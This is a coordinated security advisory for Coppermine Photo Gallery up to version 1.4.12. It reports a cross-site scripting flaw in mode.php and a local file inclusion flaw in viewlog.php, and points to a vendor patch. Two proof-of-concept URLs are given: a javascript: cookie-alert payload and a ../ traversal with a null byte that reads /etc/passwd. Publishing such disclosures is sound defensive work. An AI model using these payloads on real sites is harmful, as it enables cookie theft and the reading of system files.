============================================================ Coppermine <= 1.4.12 Cross Site Scripting and Local File Inclusion ============================================================ Author: L4teral <l4teral [4t] gmail com> Impact: Cross Site Scripting/Local File Inclusion Status: patch available ------------------------------ Affected software description: ------------------------------ Application: Coppermine Photo Gallery Version: <= 1.4.12 Vendor: http://coppermine-gallery.net Description: Coppermine is a multi-purpose fully-featured and integrated web picture gallery script written in PHP using GD or ImageMagick as image library with a MySQL backend. ---------------- Vulnerabilities: ---------------- The script mode.php does not properly sanitize the "referer" parameter. The script viewlog.php does not properly sanitize the "log" parameter. ------------ Poc/Exploit: ------------ http://localhost/cpg/mode.php?admin_mode=1&referer=javascript:alert(document.cookie) http://localhost/cpg/viewlog.php?log=../../../../../../../../../etc/passwd%00 (should need admin privileges) --------- Solution: --------- update to 1.4.13 or above --------- Timeline: --------- 03.09.2007 - vendor informed 14.09.2007 - patch released by vendor 17.09.2007 - public disclosure
